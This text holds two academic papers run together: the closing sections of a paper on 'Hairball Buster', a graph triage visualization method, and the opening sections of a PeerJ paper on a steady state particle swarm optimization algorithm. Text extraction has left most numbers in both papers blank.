then, the histogram cannot address six of the features available in hb, while the adjacency matrix cannot address four. overall, hb efficiently presents information about a graph in a single display that is not available in any other single display. we also compared these approaches visually. figure illustrates five graphs using force-based layout, a histogram, an adjacency matrix, and hb. we have shown in previous sections the variety of questions that can be answered using hb. in contrast, there is little that can be determined directly from the force-based layout except for maybe the preferential attachment graph. while the histogram correlates well with the hb curve, the histogram provides no data whatsoever about the neighbors of the nodes. the adjacency matrix shows little in the way of patterns in these examples, except for the third and fourth graph, although this may be improved by using other node orderings such as those obtained in blockmodeling. an interesting characteristic of hb not previously discussed is also shown in the proximity graph. it is clear from the histogram that the distribution is bimodal, and the adjacency matrix shows a blob in the lower left corner. hb shows not only the cluster in the upper-left corner where most of the high-degree nodes are interconnected, but also that this cluster is mostly disconnected from other parts of the graph; this could not be discovered from the histogram and is difficult to ascertain from the adjacency matrix. optional steps of the hb algorithm section ‘hb approach’ presented the six basic steps of the hb algorithm. this section describes four optional steps mentioned in the previous use cases: . if one requires the hb chart to be canonical, then rank nodes of the same degree in lexico- graphic ordering based on the node labels. . display the inverse (the gaps) of links to the neighbors. . display a log–log or semi–log chart. figure : comparing different types of graphs and algorithms. graph type force-based layout distribution adjacency matrix neighbor-metric plot (hb) jazz n = , e = random edges n = , e = watts-strogatz random graph n = , e = proximity graph n = , e = preferential attachment n = , e = hairball buster: a graph triage method for viewing and comparing graphs . display nodes with the same metric value us- ing vertical offsets. displaying the inverse is performed at the time the chart is rendered. rather than displaying the neighbor nodes at their specified x and y coordinates, display dots where there is no neighbor node, as shown in figures and . displaying a log–log or semi–log chart benefits from offsetting the origin by , or , depending on the size of the original data set, as described in the appendix. displaying multiple nodes with the same centrality measure using vertical offsets makes relationships easier to see. in this case, select the nodes of the same centrality that are of interest, as shown in figures and . calculate the size of the offset based on the number of curve nodes with the same y coordinate that need to fit within the space . above and . below the y-value. limitations of hb at the time of this writing, we have identified four limitations of the hb approach. first, if there are two or more nodes with the same degree (or other centrality measure), even though each node on the curve will have a different rank (x-coordinate), their neighbor nodes may land on top of each other. this reduces the ability of the hb display to allow an analyst to clearly see how the nodes and their neighbors relate to each other, as well as more difficult to identify which high- degree nodes are connected by two hops. to address this limitation, the hb algorithm and code allows for vertical offsets for nodes that share the same degree, as described in section ‘optional steps of the hb algorithm.’ note that for most social networks, the high-degree nodes tend not to share the same degree, and when they do, usually only a small number share the same degree. for the low- degree nodes, there is little interest in identifying whether one-degree nodes are sharing the same row. if there is a dot above it, then that one-degree node is connected to that higher-degree node. if there is no dot about it, then that node is connected to another one-degree node and not connected to the rest of the graph and is an outlier. the second limitation is that if the graph has multiple links per pair of nodes, as in a multirelational network (zweig, ), then those will not appear on the hb chart. to address this, one could translate the number of links into a link weight and color-code the weights as shown in figures and . however, if the multiple links each have their own weights, most approaches – including hb, the adjacency matrix, and blockmodeling – would be unable to represent the weights. third, hb is not designed to represent loops, or nodes that connect to themselves. while this is not usually an issue for social network graphs, it is a limitation for the basic hb algorithm. one could apply workarounds, such as a vertical offset if not otherwise being used in this hb case, or one could extend the hb display to a third dimension. fourth, while figure , for example, provides a clear indication of which nodes have the highest degree and whether they are highly connected to other (neighbor) nodes, it can be difficult to identify exactly which of the highest degree nodes are connected to each other due to the large number of nodes being displayed. to solve this display problem, we recommend taking the inverse and displaying the gaps when encountering situations with very large numbers of highly connected nodes, as well as displaying the top % of the highest-ranked nodes. (this requires no new calculations – just selecting the range of top nodes to zoom in on.) figure is an example of applying this solution, and clearly shows how few links are missing from the top nodes to be fully connected. when to use hb given the strengths and limitations of the hb approach, when should an analyst use or not use hb? the authors recommend that hb be used as the initial algorithm to apply to a data set because of its information density and computational efficiency. as a triage method, hb can provide in the first pass the number of highest degree nodes, how they relate to each other, and how they relate to their neighbors. for graphs with large number of nodes that cannot be visually separated in the full hb plot, zooming in on the top nodes provides a computationally inexpensive way to get the same information. the results of this triage can indicate areas of particular interest, such as gaps in the curve or neighbor nodes. moreover, if a graph reference library (see section ‘future features and applications of hb’) is available, the new, unknown data set can be quickly compared to its closest matches of known data sets, thereby suggesting likely underlying structures and algorithms to try next. hb may be less useful for very small graphs, when the structure of the graph is already well-understood, when an analyst already knows exactly what metrics to compute, or, as indicated by the limitations above (section ‘limitations of hb’), when the graph structure connections includes multiple links per node pair or links that loop back to the same node. future features and applications of hb the first planned future feature is to create a graph reference library (grl) to compare new, unknown graphs to a set of graphs whose underlying structure is known. for example, curves generated by exponential random graph models (ergms) will appear different from known social media data curves. once the known curves closest to the unknown curve have been identified, one can also display their neighbors and compare the neighbor distribution to the unknown graph neighbor distribution. this can provide a significant benefit to an analyst by quickly recommending known graphs to consider when analyzing a new graph to better understand its underlying structure. this comparison approach could also be automated or semi- automated by using convolutional neural networks to make these comparisons more thoroughly. note that such a broad range of comparisons is possible because the hb representation is canonical. creation of the grl and the ability to display multiple curves on the same chart for purposes of comparison will be addressed in a subsequent paper. one proposed visualization approach is to provide cross-highlighting or ‘brushing’ capabilities among different types of displays. for example, mousing over the hb display could not only provide additional information as tooltips, but by connecting to other display types such as backbone layout, also highlight the same nodes in other displays. this ability to cross- highlight selections in multiple displays would provide particular benefit in the examination of temporal displays, identifying which have changed positions in the curve and which have not. an alternative visualization approach for highlighting similarities and differences in temporal graphs is to highlight which nodes have not changed rank by more than one or two, and so on for a selected number of bands identifying such changes. this method of triage will also help analysts quickly focus on similarities and differences in temporal displays. summary of advantages of hb hairball buster (or node-neighbor centrality) is an approach that provides a computationally efficient approach to graph analytic triage. hb provides a unique, canonical representation of any node-link data set. the ability of hb to provide a standard representation allows different node-link data sets, or different time slices of the same data set, to be compared to identify anomalies or large structural changes. the computational efficiency of hb is on the order of m, where m is the number of links, plus n log n, where n is the number of nodes. because of its computational efficiency, hb can act as a triage method to identify key features of a data set, including whether the curve appears more representative of a social network or a random graph. it can also be used to quickly identify how many high- degree nodes are in the graph, which are the highest ranked nodes, whether those nodes are connected to each other directly or by two hops, and how connected the higher ranked nodes are to the lower-ranked nodes. in addition to degree, hb can visualize graphs using other centrality measures such as clique count, decay centrality, and betweenness. this flexibility of hb to represent a wide range of centrality measures is a significant benefit to analysts. this paper also presented differences between hb and force-directed and backbone layout visualization algorithms. in each case, hb provides greater information density than other algorithms at lower or equal calculation cost. overall, hb presents information about a graph in a single display that is not available in any other single display and can complement the analyst’s existing toolkit. acknowledgments no external funding was used to develop the hairball buster approach and code. the johns hopkins university applied physical laboratory (jhu/apl) funded a small internal research and development seedling project to develop the initial code in python (developed by co-author mark matties) and java (developed by co-author elisha peterson). the authors would also like to thank the following for providing data sets (cetin savkli for the jazz player data set, matt elder and janis butkevics for the toaster data, bobby seng for the codedna™ data, and mark matties for the iranian twitter™ data), marc johnson for complexity algorithm citations, and roger butler for recognizing that the hb approach was canonical. references bender-demoll, s. and mcfarland, d. a. . the art and science of dynamic network visualization. journal of social structure, . brandes, u. and corman, s. r. . visual unrolling of network evolution and the analysis of hairball buster: a graph triage method for viewing and comparing graphs dynamic discourse. information visualization, ( ): – , available at: https://doi.org/ . /palgrave. ivs. . freeman, l. c. . visualizing social networks. journal of social structure, ( ): , available at: https:// w w w.r e s e a r c h g a te.n e t /p r o fi l e / l i n to n _ fr e e m a n / publication/ _social_network_visualization_ methods_of/links/ bfc ae ac .pdf. fruchterman, t. m. j. and reingold, e. m. . graph drawing by force-directed placement. software: practice and experience, ( ): – , available at: https://doi.org/ . /spe. . ghoniem, m., fekete, j.-d. and castagliola, p. . on the readability of graphs using node-link and matrix- based representations: a controlled experiment and statistical analysis. information visualization, ( ): – , available at: https://doi.org/ . /palgrave.ivs. . girvan, m. and newman, m. e. j. . community structure in social and biological networks. proceedings of the national academy of sciences, ( ): – , available at: https://doi.org/ . /pnas. . gleiser, p. and danon, l. . adv. complex syst. , , available at: http://deim.urv.cat/~alexandre.arenas/ data/welcome.htm as cited on the konect website: http://konect.uni-koblenz.de/networks/arenas-jazz. gleiser, p. m. and danon, l. . community structure in jazz. advances in complex systems ( ): – , available at: https://www.worldscientific. com/doi/abs/ . /s . gopalan, p. k., gerrish, s., freedman, m., blei, d. m. and mimno, d. m. . scalable inference of overlapping communities. in pereira, f., burges, c. j. c., bottou, l. and weinberger, k. q. (eds), advances in neural information processing systems. mit press, cambridge ma, pp. – , available at: http:// papers.nips.cc/paper/ -scalable-inference-of- overlapping-communities.pdf. jackson, m. o. . social and economic networks, princeton university press, princeton and oxford. kamada, t. and kawai, s. . an algorithm for drawing general undirected graphs. information processing letters, ( ): – , available at: https://doi. org/ . / - ( ) - . lehmann, k. a. and kottler, s. . visualizing large and clustered networks. in kaufmann, m. and wagner, d. (eds), graph drawing. springer, berlin and heidelberg, pp. – . maughan, d. and carlsten, n. . transition to practice technology guide. department of homeland security washington dc, available at: https://www. dhs.gov/sites/default /files/publications/csd_t tp_ guide_ _webversion_ _ % final.pdf. moody, j., mcfarland, d. and bender-demoll, s. . dynamic network visualization. american journal of sociology, ( ): – , https://doi. org/ . / . nocaj, a., ortmann, m. and brandes, u. . untangling hairballs. in duncan, c. and symvonis, a. (eds), graph drawing. springer, berlin and heidelberg, pp. – . nocaj, a., ortmann, m. and brandes, u. . untangling the hairballs of multi-centered, small- world online social media networks. journal of graph algorithms and applications ( ): – , available at: https://doi.org/ . /jgaa. . peterson, e. . time spring layout for visualization of dynamic social networks. ieee network science workshop, pp. – , available at: https://doi.org/ . /nsw. . . sheny, z. and maz, k.-l. . path visualization for adjacency matrices. proceedings of the th joint eurographics/ieee vgtc conference on visualization, – , available at: https://doi.org/ . /vissym/ eurovis / - . squartini, t., mastrandrea, r. and garlaschelli, d. . unbiased sampling of network ensembles. new journal of physics, ( ): , available at: https:// doi.org/ . / - / / / . twitter™ . twitter™ website, data set regarding election integrity, periscope, scope and the periscope logo are trademarks of twitter, inc. or its affiliates, available at: https://about.twitter.com/ en_us/values/elections-integrity.html#data (accessed november , ). ware, c. . visual thinking: for design. elsevier, amsterdam. wasserman, s. and faust, k. . social network analysis by stanley wasserman, cambridge university press, available at: https://doi.org/ . / cbo (accessed october , ). white, h. c., boorman, s. a. and breiger, r. l. . social structure from multiple networks. i. blockmodels of roles and positions. american journal of sociology, ( ): – , available at: https://doi. org/ . / . zweig, k. a. . network analysis literacy: a practical approach to the analysis of networks. springer science & business media, wein, p. . connections appendix. semi–log and log–log displays for the hairball buster approach for very large data sets, a cartesian representa- tion of the hb algorithm may not be sufficient to encompass the whole data set. although the hb approach has been successfully applied to data sets with over , nodes displayed on carte- sian coordinates, there exist much larger data sets for which a semi–log or log–log display would be needed to represent all of the data in a single hb chart. (in this appendix, we will always be referring to log-base- .) when simply taking the semi–log or log–log of a data set, we immediately discovered that the display is dominated by the first few nodes, leaving little visual benefit in the remaining part of the chart. see figure a for an example of a log–log display based on the jazz player data set. this does not present particularly useful information to the analyst. however, there is an easy solution to this problem. by adding either or to all of the data points, we are essentially creating an ‘offset’ of the origin to point , or point , . figure a shows an offset of the origin to the point at coordinates , for the jazz player data set. although a relatively small data set, figure a : sample log –log plot of jazz player data set with no offset. figure a : sample offset of origin to , for log –log plot of jazz player data set. hairball buster: a graph triage method for viewing and comparing graphs figure a : sample offset of origin to , for semi–log plot of toaster data set. this example shows how the offset of the origin allows a much smoother and continuous representation of the curve compared to figure a . (one needs to remember that when reading the chart, the origin has been offset.) figure a shows the toaster data set in semi–log format. no offset was needed because the log of one is . since most of the connections are of degree , the origin of zero–zero works. however, the display tool the authors applied would not display anything at coordinate value of for the y-axis. therefore, we placed the degree one nodes at the lowest y-value on the semi–log display. steady state particle swarm steady state particle swarm carlos m. fernandes ,*, nuno fachada , ,*, juan-julián merelo and agostinho c. rosa larsys: laboratory for robotics and systems in engineering and science, university of lisbon, lisbon, portugal hei-lab—digital human-environment and interactions lab, universidade lusófona de humanidades e tecnologias, lisbon, portugal department of architecture and computer technology, university of granada, granada, spain * these authors contributed equally to this work. abstract this paper investigates the performance and scalability of a new update strategy for the particle swarm optimization (pso) algorithm. the strategy is inspired by the bak–sneppen model of co-evolution between interacting species, which is basically a network of fitness values (representing species) that change over time according to a simple rule: the least fit species and its neighbors are iteratively replaced with random values. following these guidelines, a steady state and dynamic update strategy for pso algorithms is proposed: only the least fit particle and its neighbors are updated and evaluated in each time-step; the remaining particles maintain the same position and fitness, unless they meet the update criterion. the steady state pso was tested on a set of unimodal, multimodal, noisy and rotated benchmark functions, significantly improving the quality of results and convergence speed of the standard psos and more sophisticated psos with dynamic parameters and neighborhood. a sensitivity analysis of the parameters confirms the performance enhancement with different parameter settings and scalability tests show that the algorithm behavior is consistent throughout a substantial range of solution vector dimensions. subjects adaptive and self-organizing systems, algorithms and analysis of algorithms, artificial intelligence, distributed and parallel computing keywords bak–sneppen model, particle swarm optimization, velocity update strategy introduction particle swarm optimization (pso) is a social intelligence model for optimization and learning (kennedy & eberhart, ) that uses a set of position vectors (or particles) to represent candidate solutions to a specific problem. every particle is evaluated by computing its fitness, after its speed and position are updated according to local and global information about the search. during the search, the particles move through the fitness landscape of the problem, following a simple set of equations that define the velocity (eq. ( )) and position (eq. ( )) of each particle in each time step and drive them heuristically toward optimal regions of a d-dimensional search space. here, eqs. ( ) and ( ) describe a variant proposed by shi & eberhart ( ) that is widely used in pso implementations. the difference to the original pso is the introduction of the inertia weight parameter v in order to help (together with c and c ) fine-tuning the balance between local and global search. all pso implementations in this paper use inertia weight. how to cite this article fernandes cm, fachada n, merelo j-j, rosa ac. . steady state particle swarm. peerj comput. sci. :e doi . /peerj-cs. submitted december accepted june published august corresponding author carlos m. fernandes, cfernandes@laseeb.org academic editor julian togelius additional information and declarations can be found on page doi . /peerj-cs. copyright fernandes et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:cfernandes@�laseeb.�org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ the velocity vi,d and position xi,d of the d-th dimension of the i-th particle are therefore updated as follows: vi;d tð Þ ¼ vvi;d t � ð Þ þ c r i;d pbesti;d � xi;d t � ð Þ � � þ c r i;d gbesti;d � xi;d t � ð Þ � � ( ) xi;d tð Þ ¼ xi;d t � ð Þ þ vi;d tð Þ ( ) where ~xi ¼ ðxi; ; xi; ; . . . x ;d) is the position vector of particle i; ~vi ¼ ðvi; ; vi; ; . . . v ;d) is the velocity of particle i; ~pbesti ¼ ðpbesti; ; pbesti; ; . . . pbest ;d) is the best solution found so far by particle i; ~gbesti ¼ ðgbesti; ; gbesti; ; . . . gbest ;dÞ is the best solution found so far by the neighborhood of particle i. the neighborhood of a particle is defined by the network configuration that connects the population and structures the information flow. parameters r i,d and r i,d are random numbers uniformly distributed within the range ( , ) and c and c are the acceleration coefficients, which are used to tune the relative influence of each term of the formula. most of the psos use one of two simple sociometric principles for constructing the neighborhood network (which defines the~gbest values). gbest (where g stands for global) connects all the members of the swarm to one another. the degree of connectivity of gbest is k = n, where n is the number of particles. lbest (where l stands for local), creates a neighborhood with the particle itself and its k nearest neighbors. a particular case of the lbest topology is the ring structure, in which the particles are arranged in a ring, with a degree of connectivity k = , including the particle itself. between the k = connectivity of lbest ring and k = n of gbest, there are several possibilities. two of the most used are the two-dimensional square lattices with von neumann and moore neighborhoods. usually, psos are synchronous, meaning that first, the fitness values of all vectors must be computed, and only then their velocity is updated. however, there is another possible approach, in which the velocity of the particles is updated immediately after computing the fitness. in this case, the particles move with incomplete knowledge about the global search: if, for instance, the underlying network connecting the particles is a regular graph, then, on average, each particle is updated knowing the current best position found by half of its neighbors and the previous best found by the other half. this variant, which is called asynchronous pso (a-pso), was tested by carlisle & dozier ( ). in the paper, the authors claim that a-pso yields better results than the synchronous version (i.e., s-pso), but since then other authors reached different conclusions: engelbrecht ( ) and rada-vilela, zhang & seah ( ), for instance, reported that s-pso is better than a-pso in terms of the quality of the solutions and convergence speed. the importance of investigating update strategies for pso lies in the possibility of distributed computation (mcnabb, ). even though standard psos can be easily parallelized—a particle or a set of particles can be assigned to each processor, for instance—, load imbalances may cause an inefficient use of the computational resources if synchronous updates are used. asynchronous strategies do not require that all particles in the population have perfect knowledge about the search before the update step (a requirement that may cause idle processor times in a synchronous implementation), and therefore are a valid approach for parallelizing particle swarms. in addition, fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ asynchronism can also be useful in preventing premature convergence (aziz et al., ), or to speed up convergence by skipping function evaluations (majercik, ). here, we are mainly concerned with performance issues, in general, and convergence speed in particular. the goal is to design an a-pso that, unlike the standard a-pso, significantly improves on the convergence speed of s-pso in a wide range of problems. we hypothesize that reducing the number of evaluations in each time step, while focusing only on harder cases (i.e., worst solutions), reduces the total number of evaluations required to converge to a specific criterion, that is, the computational effort to reach a solution. with that objective in mind, we have designed and implemented a novel strategy for one of the fundamental mechanisms of pso: the velocity update strategy. following the nature of the method, the algorithm has been entitled steady state pso (ss-pso). in systems theory, a system is said to be in steady state when some of its parts do not change for a period of time (baillieul & samad, ). ss-pso only updates and evaluates a fraction of the population in each time step: the worst particles and its neighbors, thus imposing a kind of selection pressure upon the whole population. the other particles remain in the same position until they eventually fulfill the criterion (being the worst particle or one of its neighbors). steady state replacement strategies are common in other population-based metaheuristics, namely evolutionary algorithms (whitley & kauth, ). however, steady state populations are much less frequent in pso (majercik, ; fernandes et al., ; allmendiger, li & branke, ). in fact, the strategy proposed in this paper is, to the extent of the authors’ knowledge, the first that uses dynamic steady state update coupled with selective pressure. furthermore, results demonstrate that the criterion for selecting the pool of individuals to update is very important for the success of the update strategy: the update step should be restricted to the worst individuals and their neighbors for optimizing performance. with this design, the steady state update strategy is not only able to improve the convergence speed of pso standard configurations, but also more sophisticated variants of the algorithm, such as psos with time-varying parameters (ratnaweera, halgamuge & watson, ) and dynamic neighborhood (vora & mirlanalinee, ). the strategy was inspired by the bak–sneppen model of co-evolution between interacting species and by the theory of self-organized criticality (soc) (bak & sneppen, ). soc is a property of some systems that have a critical point as an attractor. however, unlike classical phase transitions, where a parameter needs to be tuned for the system to reach critical point, soc systems spontaneously reach that critical state between order and randomness. in a soc system near the critical point, small disturbances can cause changes of all magnitudes. these events, which are spatially or temporally spread through the system, are known as avalanches. avalanches occur independently of the initial state. moreover, the same perturbation may cause small or large avalanches, depending on the current state of the system—that is, its proximity to the critical point. the distribution of avalanches during a large period displays a power-law between their size and frequency: small avalanches occur very often while large events that reconfigure almost the entire system are scarcer. soc complex fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ systems balance between stability and creative destruction. in fact, power-law relationships between the size of events and their frequency, one of soc’s signatures, are widespread in nature. earthquake distribution, for instance, follows the gutenberg-richter law (gutenberg & richter, ), a power-law proportion between the magnitude of the earthquakes that occurred in a specific area during a specific period of time, and the frequency of those earthquakes. self-organized criticality was studied for the first time in the sandpile model (bak, tang & wiesenfeld, ). since then, the concept has been extended to other complex systems: besides the aforementioned earthquakes, the proponents of the theory claim that soc may be a link between a broad range of phenomena, like forest-fires, ecosystems, financial markets and the brain (bak, ). one of such systems is the bak–sneppen model of co-evolution between interacting species (bak & sneppen, ). the bak–sneppen model was developed with the main objective of trying to understand the mechanisms underlying mass extinctions in nature. ecosystems are complex adaptive systems in which the agents (the natural species) are related through several features, like food chains or symbiosis, for instance. in such interconnected environments, the extinction of one species affects the species that are related to it, in a chain reaction that can be of any size: in fact, fossil records suggest that the size of extinction outbreaks is in power-law proportion to their frequency. in order to model the extinction patterns in nature and search for soc signatures in co-evolutionary systems, bak & sneppen ( ) structured a set of species in a ring network and assigned a fitness value to each. then, in every time step, the least fit species and its neighbors are eliminated from the system and replaced by individuals with random fitness. to put it in mathematical terms, the system is defined by n fitness values arranged as a ring (ecosystem). at each time step, the smallest value and its two neighbours are replaced by uncorrelated random values drawn from a uniform distribution. operating with this set of rules, the system is driven to a critical state where most species have reached a fitness value above a certain threshold. near the critical point, extinction events of all scales can be observed. self-organized criticality theory has been a source of inspiration for metaheuristics and unconventional computing techniques. extremal optimization (eo) (boettcher & percus, ), for example, is based in the bak–sneppen model. eo uses a single solution vector that is modified by local search. the algorithm removes the worst components of the vector and replaces them with randomly generated material. by plotting the fitness of the solution, it is possible to observe distinct stages of evolution, where improvement is disturbed by brief periods of dramatic decrease in the quality. løvbjerg & krink ( ) modeled soc in a pso in order to control the convergence of the algorithm and maintain population diversity. the authors claim that their method is faster and attains better solutions than the standard pso. however, the algorithm adds several parameters to the standard pso parameter set: overall five parameters must be tuned or set to constant ad hoc values. complex and dynamic population structures have been one of most popular pso research areas in the last decade. the comprehensive-learning pso (clpso) (liang et al., ; fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lynn & suganthan, ) abandons the global best information, replacing it by a complex and dynamic scheme that uses all other particles’ past best information. the algorithm significantly improves the performance of other psos on multimodal problems. ratnaweera, halgamuge & watson ( ) propose new parameter automation strategies that act upon several working mechanisms of the algorithm. the authors introduce the concepts of time-varying acceleration coefficients (pso-tvac) and also mutation, by adding perturbations to randomly selected modulus of the velocity vector. finally, the authors describe a self-organizing hierarchical particle swarm optimizer with time-varying acceleration coefficients, which restricts the velocity update policy to the influence of the cognitive and social part, reinitializing the particles whenever they are stagnated in the search space. liu, du & wang ( ) describe a pso that uses a scale-free (sf) network for connecting the individuals. sf-pso attains a better balance between solution quality and convergence speed when compared to standard psos with gbest and lbest neighborhood topology. however, the algorithm is not compared under more sophisticated frameworks or against state-of-the art psos. furthermore, the size of the test set is small and does not comprise shifted or rotated functions. finally, vora & mirlanalinee ( ) propose a dynamic small world pso (dswpso). each particle communicates with the four individuals of its von neumann neighborhood, to which two random connections are added (and then removed) in each time step. in other words, the neighborhood of each particle is comprised of six particles, four of them fixed throughout the run while the remaining two keep changing. the authors compare the performance of dswpso with other psos and conclude that due to a more balanced exploration and exploitation trade-off, dswpso is consistently better. in this work, the bak–sneppen model is used to design an alternative update strategy for the pso. the strategy has been previously tested on a set of benchmark functions and compared to a standard s-pso (fernandes, merelo & rosa, ). the results show that ss-pso significantly improves the performance of a s-pso structured in a two-dimensional square lattice with moore neighborhood. this paper is an extension of the aforementioned work. the main contributions here are: (a) a complete statistical analysis of the performance, comparing the algorithm with standard psos and variations of the proposed strategy; (b) a parameter sensitivity analysis and scalability tests showing that the performance enhancement introduced by the steady-state strategy is maintained throughout a reasonable range of parameter values and search space dimension ranging from to ; and (c) a comparison with state-of-the-art dynamic psos: clpso, pso-tvac and dswpso. materials and methods ss-pso algorithm steady state pso was inspired by a similarity between pso and the bak–sneppen model: both are population models in which the individuals are structured by a network and evolve toward better fitness values. with this likeness in mind, we have devised an fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ asynchronous and steady state update strategy for pso in which only the least fit particle and its neighbors are updated and evaluated in each time step. please note that ss-pso is not an extinction model like the bak–sneppen system: the worst particle and its neighbors are not replaced by random values; they are updated according to eqs. ( ) and ( ). as for the other particles, they remain steady—hence the name of the algorithm: ss-pso. the particles to be updated are defined by the social structure. for instance, if the particles are connected by a lbest topology with k = , then only the worst particle and its two nearest neighbors are updated and evaluated. please note that local synchronicity is used here: the fitness values of the worst and its neighbors are first computed and only then the particles update their velocity. for the remaining mechanisms and parameters, the algorithm is exactly as a standard pso. for a detailed description of ss-pso, please refer to algorithm . the psos discussed in this paper, including the proposed ss-pso, are available in the openpso package, which offers an efficient, modular and multicore-aware framework for experimenting with different approaches. openpso is composed of three modules: . a pso algorithm library. . a library of benchmarking functions. . a command-line tool for directly experimenting with the different pso algorithms and benchmarking functions. the library components can be interfaced with other programs and programming languages, making openpso a flexible and adaptable framework for pso research. its source code is available at https://github.com/laseeb/openpso. algorithm steady state particle swarm optimization. for all particles i ; . . . mf g do initialize velocity and position of particle i compute fitness of particle i end for all particles i ; . . . mf g do compute pbest and gbest of particle i end repeat update velocity (eq. ( )) of particle with worst fitness and its neighbors update position (eq. ( )) of particle with worst fitness and its neighbors compute fitness of particle with worst fitness and its neighbors for all particles i ; . . . mf g do compute pbest and gbest of particle i until termination criterion is met fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/laseeb/openpso http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experimental setup for testing the algorithm, benchmark problems (table ) are used. functions f –f are unimodal; f –f are multimodal; f is the shifted f with noise and f is the rotated f (f global optimum and f matrix were taken from the cec benchmark). population size m is set to . this particular value, which lies within the typical range (kennedy & eberhart, ), was set in order to construct square lattices with von neumann and moore neighborhood. following (rada-vilela, zhang & seah, ), c and c were set to . and v to . . xmax, the maximum position value, and vmax, the maximum velocity value, are defined by the domain’s upper limit. asymmetrical initialization is used, with the initialization ranges in table . each algorithm was executed times with each function and statistical measures were taken over those runs. stop criteria have been defined according to the functions and objectives of the experiments (see details in the section “results”). this work reports an extensive study of the proposed methodology. different kinds of experiments have been performed, each one to investigate different aspects of the steady-state update strategy. the first experiment attempts at a proof-of-concept: ss-pso table benchmark functions. mathematical representation range of search/initialization stop criterion sphere f f ~xð Þ ¼ pd i¼ xi (- , )d ( , )d . quadric f f ~xð Þ ¼ pd i¼ pi j¼ xj ! (- , )d ( , )d . hyper ellipsoid f f ~xð Þ ¼ pd i¼ ixi (- , )d ( , )d . rastrigin f f ~xð Þ ¼ pd i¼ xi � cos pxið Þ þ ð Þ (- , )d ( . , . )d griewank f f ~xð Þ ¼ þ ; pd i¼ xi � qd i¼ cos xiffi i p � � (- , )d ( , )d . schaffer f f ~xð Þ ¼ : þ sin ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi x þ y p� � � : : þ : x þ y ð Þð Þ (- , ) ( , ) . weierstrass f f ~xð Þ ¼ pd i¼ pkmax k¼ ak cos pbk xi þ : ð Þ � �� � � d pkmax k¼ ak cos pbk � : � �� � ; a ¼ : ; b ¼ ; kmax ¼ (- . , . )d (- . , . )d . ackley f f ~xð Þ ¼ � exp � : ffiffiffiffiffiffiffiffiffiffiffiffiffiffi d pd i¼ x i s ! � exp d pd i¼ cos pxið Þ þ þ e (- . , . )d ( . , . )d . shifted quadric with noise f f ~zð Þ ¼ pd i¼ pi j¼ zj ! � þ : jn ; ð Þjð Þ; ~z ¼ ~x �~o, ~o ¼ o ; ::od½ �: shifted global optimum (- , )d ( , )d . rotated griewank f f ~zð Þ ¼ þ ; pd i¼ z i � qd i¼ cos ziffi i p � � , ~z ¼ m~x, m: orthogonal matrix (- , ) d ( , )d . fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ is compared with standard (and synchronous) update strategies. the objective of the second experiment is to check if the convergence speed-up is caused indeed by the selective strategy or instead by the restricted evaluation pool, which is a consequence of the proposed method. the third test aims at studying the parameter sensitivity and the scalability with problem size. for that purpose, several tests have been conducted in a wide range of parameter values and problem dimension. the fourth experiment investigates ss-pso under time-varying parameters and experiment number five compares ss-pso with dynamically structured psos. results proof-of-concept the first experiment intends to determine if ss-pso is able to improve the performance of a standard s-pso. for that purpose, three s-psos with different topologies have been implemented: lbest with k = (or ring) and two-dimensional square lattices with von neumann (k = ) and moore neighborhood (k = ). gbest k = n is not included in the comparisons because ss-pso uses the neighborhood structure to decide how many and which particles to update: for instance, in the von neumann topology (k = ), five particles are updated. since gbest has k = n, the proposed strategy would update the entire population, that is, it would be equivalent to a s-pso. therefore, we have restricted the study to lbest, von neumann and moore structures, labeling the algorithms, respectively, s-psolbest, s-psovn and s-psomoore. two sets of experiments were conducted. first, the algorithms were run for a specific amount of function evaluations ( , for f , f and f , , for the remaining). after each run, the best solution was recorded. in the second set of experiments the algorithms were all run for , function evaluations or until reaching a function-specific stop criterion (given in table ). a success measure was defined as the number of runs in which an algorithm attains the stop criterion. this experimental setup is similar to those in kennedy & mendes ( ) and rada-vilela, zhang & seah ( ). the dimension of table median, minimum and maximum best fitness ( runs). s-psolbest s-psovn s-psomoore median min max median min max median min max f . e- . e- . e- . e- . e- . e- . e- . e- . e- f . e- . e- . e- . e- . e- . e- . e- . e- . e- f . e- . e- . e- . e- . e- . e- . e- . e- . e- f . e+ . e+ . e+ . e+ . e+ . e+ . e+ . e+ . e+ f . e . e . e- . e . e . e- . e . e . e- f . e . e . e- . e . e . e . e . e . e- f . e . e . e . e . e . e- . e- . e . e f . e- . e- . e- . e- . e- . e- . e- . e- . e- f . e+ . e+ . e+ . e- . e- . e+ . e- . e- . e+ f . e . e . e- . e . e . e- . e- . e . e- note: best median fitness among the three algorithms shown in bold. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the functions search space is d = (except f , with d = ). the results are in table (fitness), table (evaluations) and table (success rates). the best results among the three algorithms are shown in bold. when compared to s-psolbest, s-psomoore attains better solutions (considering median values of fitness distributions over runs) in most of the functions and is faster (considering median values of evaluations required to meet the criteria) in every function. when compared to s-psovn, s-psomoore is faster in every function and yields better median fitness values in unimodal functions. in terms of success rates, s-psomoore clearly outperforms the other topologies in function f , and is much more efficient than s-psolbest in function f . these results are consistent with kennedy & mendes ( ). the algorithms were ranked by the friedman test for each function. table shows the ranks according to the quality of solutions, while table shows the ranks according to table median, minimum and maximum evaluations required to meet the criteria ( runs). s-psolbest s-psovn s-psomoore median min max median min max median min max f , . , , , . , , , , , f , , , , , , , , , f , , , , , , , , , f , , , , , , , . , , f , , , , , , , . , , f , , , , . , , , . , , f , , , , , , , , , f , . , , , , , , . , , f – – – , , , , , , f , . , 